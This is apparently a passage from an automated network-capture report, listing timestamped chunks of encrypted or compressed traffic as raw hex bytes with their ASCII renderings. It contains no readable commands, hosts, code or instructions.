                2021-12-15 13:13:48 UTC50INData Raw: c0 ed e8 72 93 51 fa b8 1d 7a 29 8b 7e 51 f6 10 7d 81 44 42 31 ea 0d cf 4a 10 d0 be 1f 46 54 69 c5 82 1a 5a 9b 71 48 90 26 be 29 b8 39 ec 81 29 01 28 87 2d cf 4f 9b bc 41 f2 4d d2 ae ba 47 ef 5f 37 5b 0f 73 20 5a 40 55 f2 fc 29 34 db 46 f9 ad 75 5f 5b 33 2a 04 15 82 53 c6 6f 8b 5c 34 f3 90 b6 34 b6 08 0c 01 74 a1 a3 62 b0 a8 28 b7 fa 9f 94 d7 fc c2 f0 56 09 ba de f2 b6 e6 77 08 c0 73 76 f2 ad c4 21 9f 79 bc 51 99 c9 5e 8f 8e 30 3d 9c a3 d6 83 0d 3a 51 66 bd 3d a6 77 4b 91 7d be 8f bd a5 40 d1 79 d2 5c 1f b9 c2 33 24 de 90 4a 23 11 a2 21 ff e8 e1 1a 2a 59 8b 25 e8 4c ba 53 0b 1f 7e 12 96 68 25 77 91 6b 2a e7 e6 84 9c bc 66 6c 70 0c 74 d2 19 d9 32 49 bf 7b 21 42 57 ec a0 cf 63 81 6a 04 6b cb ce da 28 05 d7 9b 82 d0 7d 9c 6a de 6a a3 75 5e b1 78 10 d3 6a 77
                Data Ascii: rQz)~Q}DB1JFTiZqH&)9)(-OAMG_7[s Z@U)4Fu_[3*So\44tb(Vwsv!yQ^0=:Qf=wK}@y\3$J#!*Y%LS~h%wk*flpt2I{!BWcjk(}jju^xjw
                2021-12-15 13:13:48 UTC51INData Raw: a0 2d c1 b2 14 b4 63 10 1e dd 31 49 06 d8 55 84 76 8a 52 7e e2 7a da a1 6c b6 80 96 62 5e 55 cc 2c bf e1 ab 3d f3 e8 7e b2 fe 07 fa a0 05 61 17 5e 52 bd 70 93 ca f4 17 7b 01 37 49 13 b0 b9 95 8e 90 d2 41 5b de ed 7d 14 5c f9 e3 12 c1 c1 40 0d d0 d2 c5 d9 0c c6 35 08 20 ae e8 7c dd 52 4b e3 9e 4a 4a b8 e7 bd 38 04 88 77 f5 82 5e a6 f2 65 05 27 b3 95 dd 1b 26 07 9b f4 f8 5c 8a 44 f7 ab 86 72 af f5 62 90 3b f5 8c 14 ea 63 cb 37 da 09 cd 65 82 f9 37 3c 08 94 b0 86 80 10 5f 10 e8 86 10 e5 17 bf 57 32 a9 1c 61 10 92 65 a3 ab 61 9e 41 82 9b 29 b6 65 97 f3 15 e0 91 ff 3d 40 95 ef e3 27 0b e6 70 ea 70 33 10 ee 72 a9 d8 84 fd e8 ea e5 7a 8e 53 26 e0 b3 78 02 59 62 d2 3d 49 c5 a1 8c 34 14 fe e0 44 4d f4 7b e8 e8 a6 89 f7 1a 50 b7 5f 39 4a e1 4e 2d 95 75 7b 2b 93 eb
                Data Ascii: -c1IUvR~zlb^U,=~a^Rp{7IA[}\@5 |RKJJ8w^e'&\Drb;c7e7<_W2aeaA)e=@'pp3rzS&xYb=I4DM{P_9JN-u{+
                2021-12-15 13:13:48 UTC53INData Raw: a2 50 59 d3 06 be fd a3 cd dd f0 61 59 fb e1 20 d0 e8 f1 cd 93 81 c6 a8 60 4a 8b f0 07 4d 7c 65 06 c9 7d 29 cb 34 eb 05 c0 a1 61 62 ab 36 45 82 30 00 25 a1 36 eb 1a ed 0b 9b 08 5d a5 34 97 36 b8 99 cd d0 0c 2e 6c bd 82 a5 e0 26 ea 29 77 b3 b7 46 99 a5 f2 35 41 8d b7 cd 8b 37 6c d4 86 8d 51 60 bb 90 d3 b9 39 99 d7 2a a8 54 d4 a2 23 bc 93 1f ed 77 9e 44 27 9f 57 6b 94 5d 77 e6 cc fa 2c 57 dd 6e 26 23 2c 78 33 02 08 f7 37 88 6f 4f cc 81 e5 40 e2 34 1d 8a e0 34 85 70 5c 6f 45 6d 2d 2c b0 f3 6c 52 a3 d4 87 19 fe a8 d8 f5 52 40 58 0b a7 18 1b aa 7f 61 cd 5c fe ec 6e 59 2e 17 68 eb bb d6 0e 24 27 db 3d 49 ef db 86 df 46 75 19 bc 55 87 37 e7 6e b6 8a a1 17 d6 f4 60 fc 96 29 d2 97 3d 88 e8 5a 94 c2 b3 cb 0e ce d7 3f ba 2e 67 09 ee bd ff 07 56 e7 42 0e 2c d3 5a 96
                Data Ascii: PYaY `JM|e})4ab6E0%6]46.l&)wF5A7lQ`9*T#wD'Wk]w,Wn&#,x37oO@44p\oEm-,lRR@Xa\nY.h$'=IFuU7n`)=Z?.gVB,Z
                2021-12-15 13:13:48 UTC54INData Raw: cf 6e 14 94 2c d8 67 5e 46 fc 78 14 b9 f6 83 e8 8d e6 9e 17 7f 0d 5b 31 cb d3 3f d6 a7 9c 7e bb a5 37 ca 67 ce 70 8d d0 05 2d eb 26 be 5b 26 dd b7 34 49 8e 98 65 55 09 d2 f6 c3 52 ec c8 8d 78 15 85 2d 2e ee a0 77 64 69 89 18 17 07 d6 20 d9 ef f0 e4 20 3a d0 15 53 3c 66 c5 e8 50 4a c0 76 27 08 a1 91 d0 7d be b5 15 d8 f3 23 a6 32 3b aa 53 cc 49 ed b9 8c 0f b7 12 25 ed e3 5d 9f 6b 3f 20 ad e3 57 a5 ad b4 f9 38 14 f4 cc be f1 05 06 c8 63 74 0b 04 50 c5 5d 60 e4 de 1b 6a d0 e8 d2 41 46 67 5c 50 81 e8 d1 95 e6 4e 1f 41 47 f2 49 31 83 78 35 8f d8 0b 3a 3d 63 af 3a 34 81 a6 61 0d b4 00 ed e1 2f 7d 76 97 2c 17 b3 2f 1c 5d f7 3b dd fb de a6 88 6e 85 ee e1 b6 c8 9f 64 95 93 8f 0f 74 d4 19 4e 20 21 a3 06 52 42 5b 5b bb c2 ce 80 6d aa 17 46 4b b5 5a 5e 24 cb 0f 0d 7b
                Data Ascii: n,g^Fx[1?~7gp-&[&4IeURx-.wdi :S<fPJv'}#2;SI%]k? W8ctP]`jAFg\PNAGI1x5:=c:4a/}v,/];ndtN !RB[[mFKZ^${
                2021-12-15 13:13:48 UTC55INData Raw: 7d 1d 7a a2 23 d6 7e a9 6d e4 37 dd f7 50 af a2 f8 1c dc 2b fa b8 06 60 7a 01 d7 d0 40 fb 1f a3 87 1d 85 64 ee 1a 0c 81 43 2b 9b 2a f3 7e 48 66 f8 c2 0d ff 3b f4 00 f8 79 64 73 b9 14 04 5d cb fb d6 c6 2c 93 ae 5c 95 90 0e b8 ec 9a 31 65 59 3e 26 95 1e 2d 7e 37 be 33 a3 d6 d2 8e 0d 2f 81 8a 4b 3d 0a 40 63 ef a5 93 00 e3 92 21 f3 16 41 ff 86 64 00 3f 2e cd 88 74 09 db 3c 2a 58 9c 5d ef 8a e9 68 5f 00 d0 e0 75 41 20 fa fb ab d4 48 56 f7 4b 29 3b f6 48 1c 09 26 7f 09 44 0f c2 df 0f 03 dc 39 53 e2 fc 10 45 01 f5 fa e8 79 70 e5 5c 74 5a 5d c1 1c 63 9b 04 5c 3a 5f 9a 0b ac 2f 23 a3 b0 25 78 1b 3d 2d 91 99 9d 45 3a e4 93 5f aa 6d 1d ba 40 2c 40 54 62 b3 9b 12 7d 31 4e e8 ba d5 55 45 55 4e f3 0d 58 63 69 b1 48 4c 27 cf ce 1c 7d c2 0e 16 dd ce 82 45 6c 52 33 4d d9
                Data Ascii: }z#~m7P+`z@dC+*~Hf;yds],\1eY>&-~73/K=@c!Ad?.t<*X]h_uA HVK);H&D9SEyp\tZ]c\:_/#%x=-E:_m@,@Tb}1NUEUNXciHL'}ElR3M
                2021-12-15 13:13:48 UTC56INData Raw: e5 cc 4c 71 d6 6e 7e 71 1e b6 8f ed 5e ff c5 e5 ba fb e8 fe bc 23 d3 a0 89 1f 51 65 48 78 05 f1 c9 10 3e 34 32 a0 22 75 fc 83 51 2d e8 8b 40 07 fe 3e 65 8d df 15 f7 75 24 e8 de 7e 57 f9 68 a8 d6 3e 68 8f 6c 1d 1f cd a2 30 67 5f 34 30 93 cd d0 66 20 e1 28 e4 d0 92 21 45 80 60 31 90 6f 66 26 bd a3 4e ec b6 40 74 36 c0 a6 34 ef 0f 64 bb 07 d1 46 c6 70 13 44 26 5d 04 5a 22 bc 93 1d ed 77 2b 74 27 9f 57 63 6c 5c 77 e6 cd fa 71 66 dd 6e f5 7e a1 c4 76 68 f4 85 5f 0e c9 18 9a 0f 4b 2f 58 33 8a 75 92 f3 08 09 5b 6d e8 1f 38 cc b2 7f 84 a6 d7 a6 80 67 c5 63 de f1 19 95 32 d8 7f 18 96 9d 23 9d 32 a3 c9 8d e7 f4 d6 ea 94 d4 81 5d 05 fb 80 71 3d c4 2a 56 f7 d8 44 d8 b6 05 aa 43 ed e7 ed ff 05 d2 05 d7 f4 08 f8 c9 a2 37 99 16 02 30 d7 11 a8 4f 5e f2 cd d7 3f 05 1f 67
                Data Ascii: Lqn~q^#QeHx>42"uQ-@>eu$~Wh>hl0g_40f (!E`1of&N@t64dFpD&]Z"w+t'Wcl\wqfn~vh_K/X3u[m8gc2#2]q=*VDC70O^?g
                2021-12-15 13:13:48 UTC58INData Raw: 18 52 c2 17 04 1c 63 12 5d fc a6 f2 ef 83 3c 42 2e e3 f6 db 05 c5 7d 68 5a 7a 1e e7 e8 f9 b0 b1 4b cf 97 a4 c0 0f 10 24 43 39 6d 0c 1b f5 86 2a 67 ce d9 aa 24 1d 14 7c c6 e2 c6 a4 c7 e2 ef 62 48 b8 6a 03 06 12 5b b8 d2 4c 85 67 29 b4 49 bc e7 06 7b a6 a3 2c da 10 1b 8c a3 c0 31 0e a2 69 0f 86 0d ce 17 35 57 c5 46 8d b4 4e da 24 a6 48 7d ca 41 57 8d 24 74 0e 5f 9d 4e 33 f4 43 c7 c4 a8 7a 0e d1 ac d8 fd 12 5f f6 88 1a 6d 71 4f 9f 6c e6 c0 4f 6e 1f 9f 32 f4 c0 72 97 0a ad e1 21 5e e8 02 c5 66 66 5a 1e 23 86 d1 63 5c e5 8d 22 a4 02 eb e8 bb 7d 44 ad f7 f4 b9 36 55 d0 f2 d2 ef 01 d8 f6 f1 3d 63 a7 68 98 d3 2d 84 00 1d c0 9a a8 1b f4 63 30 40 93 e4 d5 1a e9 99 2b 5e ff 93 36 84 38 8d 5f a9 6d 4d 94 85 65 c3 e5 6d 25 e8 de 5b 8b c9 da 7b 52 85 74 9d e9 4b 8b 34
                Data Ascii: Rc]<B.}hZzK$C9m*g$|bHj[Lg)I{,1i5WFN$H}AW$t_N3Cz_mqOlOn2r!^ffZ#c\"}D6U=ch-c0@+^68_mMem%[{RtK4
                2021-12-15 13:13:48 UTC59INData Raw: cd f2 f6 63 b3 3b ef 2c d8 67 e1 9a 37 da 96 0f 55 99 e9 33 72 2e 50 36 64 22 25 28 83 e3 f1 29 9d 71 b4 43 fc 2f 4d bd 91 92 eb 1d a6 87 4a b6 4d af e3 f1 7e c0 bb 86 24 f9 94 b8 1e fa 5b 7b 85 94 b1 fe 07 91 cf e1 e4 d7 da ab 2f 1a e2 9d 97 88 43 ab 3c 4b 11 b0 53 7d 4f 1d 57 3e e0 09 9f b8 8e a0 55 4d 16 79 85 66 7a 4c ae fe 46 4d 2e 26 e0 76 54 98 27 06 52 3e e4 ad 07 5c 33 81 5d 03 72 fa 78 09 f6 24 09 58 5d bf 56 37 90 29 e0 31 37 20 e0 75 41 fb 5e 74 6f d0 af d3 4d 6b 6d c4 89 c1 49 97 f5 41 38 ab 06 fa 1e 86 05 2d c7 89 6f 99 a0 cf 92 e2 90 eb 6e 0d 5f 65 0d 20 a7 c9 97 2e e8 9d 5e e6 0e c8 36 56 f5 26 28 e5 be b4 17 3e e9 9d 7a 48 f0 90 e7 a6 a3 57 92 88 ea ce a4 56 3e 72 24 17 40 f7 e6 39 43 4a 28 27 3c ef 26 1b 70 c3 34 3a cd 5d d5 24 d4 85 71
                Data Ascii: c;,g7U3r.P6d"%()qC/MJM~$[{/C<KS}OW>UMyfzLFM.&vT'R>\3]rx$X]V7)17 uA^toMkmIA8-on_e .^6V&(>zHWV>r$@9CJ('<&p4:]$q
                2021-12-15 13:13:48 UTC60INData Raw: 63 3c 4c 04 6b cd bb bd 10 ea ad 3d 7b 95 92 dc 91 2b 3b f5 9d eb e5 d4 85 61 72 1e 03 30 0c 40 1f 02 aa 12 25 e5 65 51 95 cc b9 aa 36 c9 93 0c 05 f7 5f dd 8a 99 07 1f c4 68 58 cb 81 5b b9 09 72 73 ba 2c da 81 05 8e f3 3a 3c e8 23 15 c1 97 55 f7 da b6 67 d4 cc dd f9 22 18 99 4e 14 4e a3 9f 38 82 56 9b ff b9 7f 9f 5a 2a ad 66 29 b2 39 17 e7 b6 c3 60 2f 90 24 fd f5 5f 32 53 65 45 a5 39 15 97 26 24 d0 91 21 a1 63 6c 40 3f 61 db a7 d8 e3 a4 c2 94 ae 0c ed 9d 12 75 3c a3 46 4c 2d 25 2e 76 02 f4 8b b6 ce 65 17 1e 89 c2 a3 1d 48 09 ba 6d ae 01 5a a3 90 17 63 16 10 e0 aa 00 6a 5a 2b 78 f0 05 11 d8 18 a2 3b 25 61 a7 48 50 a2 53 62 cd 5c af ec 70 76 2e 17 e6 a6 c7 a2 77 83 46 dd 6c 2c af 09 7a 20 34 b2 65 ab bd 9d 65 6a b2 6e c9 16 4a 17 0b 9f 7f 0c be b2 0a f1 66
                Data Ascii: c<Lk={+;ar0@%eQ6_hX[rs,:<#Ug"NN8VZ*f)9`/$_2SeE9&$!cl@?au<FL-%.veHmZcjZ+x;%aHPSb\pv.wFl,z 4eejnJf
                2021-12-15 13:13:48 UTC61INData Raw: 73 61 6d 9c 25 45 09 85 5f 9d b6 e1 07 1e db 3f 4d 4e 1c 09 8d 8d 9a b3 a6 f3 8c ea 98 c6 eb 9d 50 90 22 46 87 2c af 5c e9 65 b4 16 08 38 a1 3a 0d ab 04 b6 7a 1e 79 58 66 82 10 77 5f 09 45 9c e5 56 50 e1 80 f3 28 e7 26 e4 29 b0 89 cb 54 4a 46 5f b6 bc 0b e6 3e 37 36 29 82 96 11 ff 25 33 88 20 e8 41 ce 82 63 29 37 a4 5d a6 0c 6e 82 5d 98 74 47 e1 31 b9 06 29 4d e3 d3 f7 22 3d 67 e8 bf 38 c0 25 83 49 81 98 49 cb 69 df 1f 05 29 c8 5c e1 f7 68 58 d4 25 3c 69 28 8e 1f 4a 40 75 84 8f 1a bb d0 7f 57 f4 29 76 ef 9a 22 c6 34 89 dd aa 9b c9 f3 8a 37 e2 4d 67 a1 1a b5 8f 58 c2 eb e8 30 10 d3 e6 08 0b 50 d2 c4 ce bb d3 41 a8 62 b0 10 d5 2d e8 53 6f 06 23 6d a0 21 ff 04 25 61 11 5d 01 d5 b3 b2 45 21 82 fb 26 28 ec ef e3 16 ba 01 2a a1 92 5a 92 4e e1 98 8f 65 1e 8c 94
                Data Ascii: sam%E_?MNP"F,\e8:zyXfw_EVP(&)TJF_>76)%3 Ac)7]n]tG1)M"=g8%IIi)\hX%<i(J@uW)v"47MgX0PAb-So#m!%a]E!&(*ZNe
                2021-12-15 13:13:48 UTC63INData Raw: ae b1 1a 06 94 02 40 b0 76 9e 81 d7 fb 9b bc 09 b1 bb 27 7e 72 6c 6f 6d b5 14 30 96 65 ab 1a 25 23 ac 29 a4 b2 1d d2 b6 aa 07 3b 4c 51 2f e2 95 98 94 f3 83 a9 42 f3 be fb 2f ca f1 0e c2 db b5 7a 0b 28 14 da 2a cf 65 c2 21 de 7a 79 55 9c c7 44 0c 2b 34 7b 0c 04 ed d6 27 fb de 32 15 18 7b 01 07 49 2d 76 bf a4 8e f5 97 75 a0 21 99 2a f5 10 a2 e2 2e 29 b8 8e 5b 81 b9 8e da 89 06 cb 34 df f7 9a 0a 7a 96 7b bc c0 7f 02 b8 64 00 9b 74 92 d5 37 63 db d7 4c 5e aa fc df 1e e9 e0 d9 73 e1 6b 20 c2 f7 24 f7 c1 d4 74 15 e0 c6 8f 3b 76 cb d8 4f fc e0 4e 97 d7 b2 7b 20 c5 93 97 82 78 31 3a 53 f8 cb fa bb d0 cc 69 e7 e2 2e e4 a9 54 63 10 c2 65 81 37 92 61 be 86 97 ef a0 c9 cc 11 7b 68 6f ff 79 c1 45 0d 56 3a ce ab 32 42 26 33 b1 fd 72 a9 d8 84 fd dd b5 bc a0 83 30 df 02
                Data Ascii: @v'~rlom0e%#);LQ/B/z(*e!zyUD+4{'2{I-vu!*.)[4z{dt7cL^sk $t;vON{ x1:Si.Tce7a{hoyEV:2B&3r0
                2021-12-15 13:13:48 UTC64INData Raw: fb e5 1e 77 c9 da 93 48 f9 31 65 6e 8f 87 b1 45 0b ef 92 4b 3e d4 71 65 db 58 35 15 62 95 21 b6 73 f1 d6 5a 87 bf 34 ff 1e 28 87 a3 ee 26 ea d9 75 a0 89 17 28 06 85 51 04 72 0d 8f e7 13 a3 8f 56 62 78 cf dd 4a 6b b2 cb f5 d8 cb 20 71 0f 85 a3 fb 1e 6c f1 f5 ac 45 ec 25 81 c2 e5 5a b7 e4 ac 30 5d 76 69 98 b2 18 10 88 2c 00 a9 e9 a5 04 31 57 d9 b8 28 cf 31 6e 07 66 26 bd 70 ea 6c f3 b8 4c ba 1c 1b 11 af 5e 32 02 0e 1d 07 39 1a 98 ad 79 db 91 a2 5c 87 7c ca 7b eb cd c1 5b 58 da 93 84 2c 06 71 d5 12 75 ee 8d 86 1a 9c a1 c4 f5 c6 fc 8b b5 16 65 6c c8 e2 94 b3 90 4d 1f c2 6d a1 d5 73 71 13 d3 e4 ed e4 95 ba 09 e3 ea 7b f3 df 36 11 10 a5 0c 49 8f e7 f5 4e c6 74 97 5e c8 5c 50 8f 3d a9 ad d3 73 d4 3a d6 dd 6c 7e 33 2f 7e 7a db f1 6d a9 aa 0d 15 40 e1 f3 e3 8b f1
                Data Ascii: wH1enEK>qeX5b!sZ4(&u(QrVbxJk qlE%Z0]vi,1W(1nf&plL^29y\|{[X,quelMmsq{6INt^\P=s:l~3/~zm@
                2021-12-15 13:13:48 UTC65INData Raw: 95 ea 98 05 14 08 34 52 6a 89 c5 a1 59 a7 f4 97 84 50 4d 03 c9 7b 3e c8 e9 ec 6c 46 3a 8b 06 34 09 04 80 e7 c7 68 be d4 86 b4 68 14 62 58 c1 4a d1 0c a0 fc 36 bb 00 0b 54 59 52 d1 60 d6 16 5b 46 29 d9 fc f8 7e bb 4d 6f 9a d5 ce 1a cb d0 15 31 e9 fc d0 36 91 22 48 e7 4a eb d7 40 59 35 89 45 9e e8 d7 9e 9e 90 40 d9 f9 4b 86 e8 67 a3 2c 07 12 ff 81 cf c8 5b 8c 34 fc c9 54 55 98 8b d5 14 b4 d1 2e a2 c3 c6 55 a2 b2 07 cf ff 83 96 6f 8b 8d 18 55 34 e1 dc 79 3e 49 ed 09 9a 54 be cc ad 78 5f a0 3e 1f 32 2c 8c 19 37 f7 b8 da 91 d4 42 fc 7d a2 24 15 39 72 e1 ac 08 c4 00 f9 8e 5c be d9 66 e1 95 6f 36 e5 1a 31 b4 8e 5d e8 bb c3 5f 01 42 f4 3a 71 8d 47 d9 ad c2 11 ce bc 32 2f 35 cc ab 25 8d a6 d8 01 de 00 87 62 b9 2e f8 87 5d 51 e5 ad d4 bf 7e 7e 6f 39 10 da 88 ed c2
                Data Ascii: 4RjYPM{>lF:4hhbXJ6TYR`[F)~Mo16"HJ@Y5E@Kg,[4TU.UoU4y>ITx_>2,7B}$9r\fo61]_B:qG2/5%b.]Q~~o9
                2021-12-15 13:13:48 UTC66INData Raw: 39 9b 3f 73 32 aa ae 6e 76 50 9a f2 20 a7 c5 27 93 62 4e 6d c9 50 1e 97 bf d0 f1 a8 da 35 ce 9f 50 2c 91 ff e9 b7 47 82 ee e1 aa 6d f4 7e 22 5e 58 4a 23 24 ce 18 0a 48 4b 3d b9 5e 8d 1b 37 74 cd 31 38 46 05 72 df b2 9a 33 b0 13 cb 5d 23 48 03 e5 53 56 b5 62 04 2f d8 fb 33 6f dc e9 00 50 93 ca 8b ea 03 87 24 2d e8 1d 32 32 44 71 f0 d9 be 61 6e 2e fb 6f 0c 8a 53 14 e9 43 cb 97 be 1a c1 6c 0c 0c c0 12 72 98 31 e5 cf b5 39 53 b9 ab b3 6b e9 19 b3 e1 71 be 4f b5 20 c9 84 d9 d1 30 c1 c8 99 2f 84 28 06 e4 ee cc f4 67 3c 0e 1b 4c 8c 33 95 98 65 8f 69 cf f3 a1 67 00 ab 99 6a 51 e3 0d c3 97 ea 6a 7a aa 67 e8 32 b5 c8 8b f1 23 08 ea 2b ec c7 73 b6 05 97 ec 5c e1 24 21 ed 06 5f 9f 6b 85 fc ca c5 54 09 ba df f2 01 bb 77 08 27 ff 25 f4 38 1e fd e3 f9 e1 af 66 b5 c8 f9
                Data Ascii: 9?s2nvP 'bNmP5P,Gm~"^XJ#$HK=^7t18Fr3]#HSVb/3oP$-22Dqan.oSClr19SkqO 0/(g<L3eigjQjzg2#+s\$!_kTw'%8f
                2021-12-15 13:13:48 UTC67INData Raw: f6 08 09 d3 6e e8 1f 38 72 08 d6 7d 59 a5 a0 35 66 6b 17 10 3d d0 51 aa f5 58 e7 1d df 2d 10 b7 cf 52 fb 8c e1 7f ff bd d7 14 a2 05 e9 40 26 c2 3b 12 df 7b 20 b9 75 8e 11 ba 62 37 e7 ed 9a 64 54 af d7 79 e5 8c 36 5d c8 a2 fa e3 e5 d7 41 2a a2 9e f1 9e 02 13 44 27 de f9 d5 7c c8 fa f8 f0 ce 55 f2 34 d9 52 0b 2f 89 ae f7 45 ad 43 10 56 f2 21 72 18 90 91 59 16 ef e3 22 30 2c 2e ae e8 81 04 9c 62 93 96 7d 4a 82 1d f2 7e c0 eb e0 a6 8b 52 47 95 a1 6c a1 e8 c1 e6 01 f8 fa a0 25 6f 9a a5 91 1c 89 9c 48 d9 e6 09 ab 95 90 0e b8 ed 7d b2 b7 57 b5 f3 77 fa 18 d4 5d aa 31 80 39 8d d0 56 5b b4 5c 06 2a 57 74 d4 12 44 50 3e 0d 8b e4 b6 15 2b 82 54 64 04 c0 ff 44 48 a7 5f 8c 69 db f0 84 cc be d5 e9 69 9c 3a 67 a5 b3 43 e3 84 7e ee 1a ab 02 da 12 d5 ed ff 0d c6 09 2a fb
                Data Ascii: n8r}Y5fk=QX-R@&;{ ub7dTy6]A*D'|U4R/ECV!rY"0,.b}J~RGl%oH}Ww]19V[\*WtDP>+TdDH_ii:gC~*
                2021-12-15 13:13:48 UTC69INData Raw: 5e bf ef e7 28 9d a3 1a a2 0b fa 00 eb 63 ce 9d 3c 9f 57 ff 3a f2 21 e1 5c 59 7b 3d 30 8a 46 6d ee 5a b0 c7 65 c6 22 5d de 8b 09 41 76 2a 9e 66 10 0c 27 7a 4b 0b 14 7e 84 44 9b 02 60 26 45 2a a1 6d d5 b9 cb 99 93 0c a1 34 d6 71 5c af 64 b0 7b 38 42 63 32 64 0e 83 dc a9 47 6b 46 c8 fa c0 79 55 d3 0f d4 54 9b e1 5d be 2e e9 e7 d9 fa e7 5e 8b e1 eb 0f 87 d1 fe 7f f7 59 25 71 64 51 95 9b 01 ec d3 3a 6c 7e 13 5f a8 af f8 5b fb b2 d3 b9 06 5e 79 28 cb 9a df 73 96 28 d8 61 d7 26 81 10 73 8b f3 c0 b3 0c fa e1 7e 60 98 a1 30 ca 88 c6 02 12 88 c8 ed 6d f1 78 d1 08 92 4c 6c 83 60 26 06 ee 30 ce d6 d8 e9 18 35 84 06 bc dd d7 f4 62 f6 ce ac 19 6b e8 c6 4f 1b ab e5 a5 5a 29 8a bf 3e b0 ee 67 84 f9 eb a0 81 6d 71 fc 4b be da a3 75 a3 7d d1 82 2c 50 57 23 89 18 89 24 12
                Data Ascii: ^(c<W:!\Y{=0FmZe"]Av*f'zK~D`&E*m4q\d{8Bc2dGkFyUT].^Y%qdQ:l~_[^y(s(a&s~`0mxLl`&05bkOZ)>gmqKu},PW#$
                2021-12-15 13:13:48 UTC70INData Raw: 5c 41 82 05 01 bc be 8b f9 a0 92 5f 7c 10 2c 3c 07 48 3e c8 3e 9a e2 9a f2 fd e8 24 41 a0 50 be 6a 63 d4 76 e0 52 c4 f5 28 e5 63 96 28 7d 45 6f fc be 84 e1 e7 ae bd 51 92 88 eb 40 52 1d d2 89 56 a4 a8 ef 16 b4 d6 31 a0 d0 a9 bc 1a fb 80 9d d8 c1 b1 66 97 92 c6 a6 db 38 65 72 4d a0 0d a4 f8 4a c3 ec 18 52 70 48 82 3e 09 24 d0 ad cf 08 c0 83 38 14 a0 62 d0 2f ed 72 27 87 2c 77 4b e1 bf 11 ad fa 52 bb eb 9f 63 c8 d4 2a 93 7f 70 85 44 b2 d0 7a 8f f6 b9 9d 5d dd 6d fc 47 c3 6c 95 5e 73 60 df 23 6c 9e 55 35 5f 64 7e d0 29 d7 6a 78 d2 43 3d 5b ed 0c 27 2e 69 a9 15 9a 8a 3a 33 a4 f0 a1 0c 43 89 5d 98 72 55 dc d6 42 f9 5d 40 53 dc a5 ca 5c 38 17 bf b3 ed 64 59 34 a9 c0 b6 34 b8 48 59 ee 4a 0e d1 64 98 57 87 a0 f7 30 7c 0a d3 4f 1c 25 7a 00 63 e1 c7 eb f4 cc ae 23
                Data Ascii: \A_|,<H>>$APjcvR(c(}EoQ@RV1f8erMJRpH>$8b/r',wKRc*pDz]mGl^s`#lU5_d~)jxC=['.i:3C]rUB]@S\8dY44HYJdW0|O%zc#
                2021-12-15 13:13:48 UTC71INData Raw: c8 e2 0f 1e 17 ec 9e 5c e2 34 27 db 85 19 1e 8c a3 1b 81 e4 62 24 e0 cf 84 f1 08 c3 71 3a 3a 9c d0 70 c1 94 32 9b 39 18 96 a4 bb 81 bf ef af 06 f8 37 2a 1d 6b 2b ba d0 dd e0 7e 8b d5 bc e4 db 7a ab 37 23 43 54 42 ef 23 a6 6e b6 9e ac 47 a1 6f 60 fc 43 24 33 c0 fe e2 b5 3f 4b 5c 4f 34 7a d3 7d 86 73 0c ce 7f e5 38 f5 fb a9 f0 bb 2e 0d cb d9 52 17 f5 17 62 f2 2f ed a8 6c 56 42 80 e2 c1 82 10 59 ba 66 32 56 f6 7e cc 51 10 2e a9 f7 83 25 1d 85 06 41 e1 f9 7e c0 bb e3 b0 95 69 47 6a e6 c1 a3 03 a4 1a 88 7e 71 6e 2d e4 3f 36 1e d8 8f 10 0e 6b 47 a8 ec c2 1b 7b b0 e0 1e 6b 40 94 ea fe 12 d2 76 f5 b8 f7 71 be 21 35 6e 25 3f 7d 6d 70 79 6f 74 7e 64 27 30 53 15 d1 a7 d3 cd 91 88 cd 68 33 00 a8 1f 88 f0 09 db 0c 6f 5d bf 7a 3a 9a ef a5 0b f8 dd 3b fc 8f 75 c7 b2 7c
                Data Ascii: \4'b$q::p297*k+~z7#CTB#nGo`C$3?K\O4z}s8.Rb/lVBYf2V~Q.%A~iGj~qn-?6kG{k@vq!5n%?}mpyot~d'0Sh3o]z:;u|
                2021-12-15 13:13:48 UTC72INData Raw: 29 0c d5 0a c8 65 0e 0a 04 50 2a a6 39 88 43 67 6a d0 e0 22 c9 4a 68 d8 90 ea e8 bb 16 c9 29 f7 fb be 74 48 5b bf ad c0 63 30 ef c2 41 62 24 ac 1b d0 b6 32 d0 5b 4c 79 1e 82 7a f4 0f 3b 17 e4 ad 6d f2 81 81 56 d7 04 5f 48 1b 2c ab 5a c2 53 19 c0 ec 82 d4 a2 f3 42 10 1e 77 c8 da 7b 52 1d 6f ee 08 16 48 6f 42 83 6b 4c 4b 3e d5 fa 28 cb 50 03 9a 86 c8 e2 51 f5 f7 9b d7 d9 87 0d a8 7b 93 5c 0c 40 1f 02 76 59 8c 77 65 51 3b 9f b9 7a 6b c9 93 d2 1d 0e a8 db 8a 0c 55 1a c4 b8 7e 34 7e 5b b1 6d 74 73 ba f2 cd 75 f7 42 7e 64 bb 46 86 59 73 90 8f 6c 1d ed c9 a2 30 67 67 62 9b 5d f5 55 a6 2f 64 86 82 59 1f 89 33 3a 67 54 19 45 37 ad 78 15 7c 18 3b d5 b2 c9 6f d4 2b b7 a1 e3 d0 22 2f 3c f9 15 96 a2 25 d0 91 29 8a bf e7 09 97 cd 24 77 5b a4 de 65 6c c5 fd 62 76 11 f8
                Data Ascii: )eP*9Cgj"Jh)tH[c0Ab$2[Lyz;mV_H,ZSBw{RoHoBkLK>(PQ{\@vYweQ;zkU~4~[mtsuB~dFYsl0ggb]U/dY3:gTE7x|;o+"/<%)$w[elbv
                2021-12-15 13:13:48 UTC74INData Raw: b2 17 5d 67 a9 81 de 62 b2 33 be 95 2a 59 d8 f4 12 72 53 9f f0 83 27 3f f6 6b e0 e5 11 ae ad 3d ad 46 b9 9f 5c b7 61 63 06 59 e3 5c 92 87 36 98 df e5 dd d0 90 28 22 70 49 77 bd 0d 91 38 fb 08 e2 6a 57 53 6d 28 e7 db 26 af 98 58 fb fc cd 87 b0 57 d1 b8 d9 a7 1f 86 59 09 83 79 6d f3 7f a6 fd 9a ca 6a 96 db 38 71 29 4d 68 f7 ed 42 49 62 28 08 38 b6 80 e3 64 f4 fb 2f 00 a9 a9 07 84 fa 14 c6 68 59 df 88 d2 fc 00 2e 03 c9 bf be 11 30 d7 ad 44 e5 de 3b 36 eb 85 4e 12 76 ed bb 4d 04 ee 73 4d e2 8b 52 d2 eb 46 54 c7 c0 3d ee 7e 35 03 9e d4 58 dc b9 97 65 7b 7d 3e 9a 44 fd aa 3d 06 b4 be 24 46 36 2c 51 2f 17 6d c3 45 d6 77 0d 1b b5 7b 0b 70 af eb 99 3a d3 06 c8 c2 1a 4d 8f df aa 67 45 e9 b3 68 9c 33 f6 59 62 3d ec b8 48 65 68 51 51 d8 63 74 ac 78 da 5f 14 ea 5a 34
